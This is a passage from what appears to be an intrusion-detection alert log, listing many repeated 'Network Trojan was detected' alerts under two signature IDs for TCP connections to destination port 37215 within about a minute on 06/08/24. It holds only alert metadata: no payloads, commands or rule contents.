          SID:2835222
          Source Port:53952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601217
          SID:2829579
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808981
          SID:2835222
          Source Port:47748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402367
          SID:2835222
          Source Port:54588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274361
          SID:2829579
          Source Port:52484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552326
          SID:2829579
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176132
          SID:2835222
          Source Port:47164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850288
          SID:2835222
          Source Port:57404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800869
          SID:2835222
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744216
          SID:2829579
          Source Port:37384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706363
          SID:2835222
          Source Port:43120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238100
          SID:2835222
          Source Port:45190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789924
          SID:2829579
          Source Port:43292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861467
          SID:2835222
          Source Port:38044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354602
          SID:2835222
          Source Port:40196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407679
          SID:2829579
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188770
          SID:2829579
          Source Port:37564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837573
          SID:2829579
          Source Port:46716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021467
          SID:2829579
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017364
          SID:2835222
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129454
          SID:2835222
          Source Port:51162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709337
          SID:2829579
          Source Port:44340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177696
          SID:2829579
          Source Port:55744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164381
          SID:2829579
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403713
          SID:2835222
          Source Port:43968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887969
          SID:2829579
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896448
          SID:2835222
          Source Port:34158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463491
          SID:2835222
          Source Port:35364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162657
          SID:2835222
          Source Port:34564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784222
          SID:2829579
          Source Port:41318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353328
          SID:2835222
          Source Port:37114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510613
          SID:2829579
          Source Port:54286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260025
          SID:2829579
          Source Port:50966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800020
          SID:2829579
          Source Port:35704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893403
          SID:2829579
          Source Port:54280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445827
          SID:2829579
          Source Port:37334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109432
          SID:2835222
          Source Port:46366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542897
          SID:2829579
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707319
          SID:2829579
          Source Port:48042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160247
          SID:2829579
          Source Port:43704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005412
          SID:2829579
          Source Port:36142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154053
          SID:2829579
          Source Port:59934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465686
          SID:2829579
          Source Port:40360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155455
          SID:2835222
          Source Port:49078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466171
          SID:2829579
          Source Port:60332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353028
          SID:2835222
          Source Port:44898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462586
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239728
          SID:2835222
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599080
          SID:2835222
          Source Port:52958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897709
          SID:2835222
          Source Port:45526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747356
          SID:2829579
          Source Port:42220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463543
          SID:2835222
          Source Port:40082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912927
          SID:2835222
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463143
          SID:2829579
          Source Port:42612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353864
          SID:2835222
          Source Port:44556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895849
          SID:2829579
          Source Port:46868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075786
          SID:2829579
          Source Port:43518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355008
          SID:2829579
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442027
          SID:2829579
          Source Port:47782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136130
          SID:2835222
          Source Port:38144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441988
          SID:2829579
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733148
          SID:2829579
          Source Port:39568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733251
          SID:2829579
          Source Port:33220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355390
          SID:2829579
          Source Port:43846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403167
          SID:2829579
          Source Port:36722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271356
          SID:2829579
          Source Port:36968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015415
          SID:2829579
          Source Port:39906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604692
          SID:2829579
          Source Port:53852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733162
          SID:2829579
          Source Port:54000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130243
          SID:2829579
          Source Port:44504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782045
          SID:2835222
          Source Port:47914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829542
          SID:2835222
          Source Port:35594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895770
          SID:2829579
          Source Port:44462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911558
          SID:2829579
          Source Port:53502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548127
          SID:2835222
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107676
          SID:2835222
          Source Port:55206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160512
          SID:2829579
          Source Port:53306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471336
          SID:2829579
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731596
          SID:2835222
          Source Port:39436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461891
          SID:2829579
          Source Port:37760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704703
          SID:2835222
          Source Port:53074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449350
          SID:2835222
          Source Port:47438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817572
          SID:2829579
          Source Port:35806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108929
          SID:2835222
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893264
          SID:2829579
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353720
          SID:2829579
          Source Port:49960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153658
          SID:2835222
          Source Port:40140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599387
          SID:2835222
          Source Port:54294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036363
          SID:2835222
          Source Port:36348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602253
          SID:2835222
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043559
          SID:2829579
          Source Port:52166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159043
          SID:2835222
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509666
          SID:2829579
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897196
          SID:2829579
          Source Port:48384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274056
          SID:2835222
          Source Port:52572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606048
          SID:2829579
          Source Port:53226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402481
          SID:2835222
          Source Port:45234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456521
          SID:2835222
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461592
          SID:2829579
          Source Port:38276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302303
          SID:2829579
          Source Port:43918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799505
          SID:2835222
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599488
          SID:2835222
          Source Port:55978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729998
          SID:2835222
          Source Port:38966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670500
          SID:2835222
          Source Port:42672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404768
          SID:2829579
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847203
          SID:2835222
          Source Port:35010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351704
          SID:2829579
          Source Port:42610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405910
          SID:2835222
          Source Port:51322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832374
          SID:2829579
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115159
          SID:2835222
          Source Port:45648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071155
          SID:2835222
          Source Port:54636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136174
          SID:2835222
          Source Port:36000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463991
          SID:2835222
          Source Port:42192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796448
          SID:2835222
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789645
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671728
          SID:2835222
          Source Port:43250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449046
          SID:2829579
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820993
          SID:2835222
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274186
          SID:2835222
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787865
          SID:2829579
          Source Port:38198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895802
          SID:2835222
          Source Port:59418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.791920
          SID:2835222
          Source Port:33614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704439
          SID:2829579
          Source Port:56966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516425
          SID:2835222
          Source Port:51180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509190
          SID:2835222
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175216
          SID:2829579
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161073
          SID:2829579
          Source Port:58898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273254
          SID:2835222
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810531
          SID:2835222
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441372
          SID:2835222
          Source Port:34892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815479
          SID:2835222
          Source Port:59312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743397
          SID:2835222
          Source Port:35178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708429
          SID:2829579
          Source Port:44150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854099
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511651
          SID:2829579
          Source Port:51330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891643
          SID:2829579
          Source Port:43880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162590
          SID:2835222
          Source Port:38308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816967
          SID:2829579
          Source Port:35980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912212
          SID:2829579
          Source Port:43578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782087
          SID:2829579
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746233
          SID:2829579
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306502
          SID:2835222
          Source Port:39770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550754
          SID:2835222
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462649
          SID:2829579
          Source Port:33750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737856
          SID:2829579
          Source Port:42584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794776
          SID:2835222
          Source Port:34970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168352
          SID:2835222
          Source Port:45282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704678
          SID:2835222
          Source Port:35340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172914
          SID:2829579
          Source Port:50178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747405
          SID:2829579
          Source Port:44738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745176
          SID:2829579
          Source Port:55178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806444
          SID:2829579
          Source Port:51504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266030
          SID:2835222
          Source Port:49052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108846
          SID:2829579
          Source Port:50678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149869
          SID:2829579
          Source Port:47094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.083030
          SID:2829579
          Source Port:37174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021868
          SID:2835222
          Source Port:59754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555437
          SID:2835222
          Source Port:46782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732294
          SID:2835222
          Source Port:45004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406101
          SID:2829579
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043590
          SID:2835222
          Source Port:42968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893934
          SID:2829579
          Source Port:47526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797285
          SID:2835222
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463487
          SID:2835222
          Source Port:40326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017065
          SID:2835222
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705853
          SID:2835222
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456269
          SID:2835222
          Source Port:46260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817175
          SID:2835222
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788385
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159283
          SID:2835222
          Source Port:51516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740021
          SID:2835222
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044881
          SID:2829579
          Source Port:59210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552420
          SID:2835222
          Source Port:55984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672794
          SID:2835222
          Source Port:55470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894067
          SID:2829579
          Source Port:59030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172592
          SID:2835222
          Source Port:35386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671377
          SID:2829579
          Source Port:46998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743151
          SID:2829579
          Source Port:49740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410511
          SID:2835222
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236752
          SID:2829579
          Source Port:34480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112654
          SID:2829579
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463011
          SID:2829579
          Source Port:33128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893608
          SID:2829579
          Source Port:41964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266248
          SID:2829579
          Source Port:49340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177828
          SID:2835222
          Source Port:48218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274276
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782940
          SID:2829579
          Source Port:52090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269898
          SID:2829579
          Source Port:37984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264350
          SID:2835222
          Source Port:41398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128580
          SID:2835222
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672826
          SID:2829579
          Source Port:43622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793093
          SID:2829579
          Source Port:50252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465393
          SID:2835222
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178567
          SID:2835222
          Source Port:48436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159400
          SID:2835222
          Source Port:47232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729517
          SID:2835222
          Source Port:42754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107722
          SID:2835222
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128053
          SID:2829579
          Source Port:60384
          Destination Port:37215
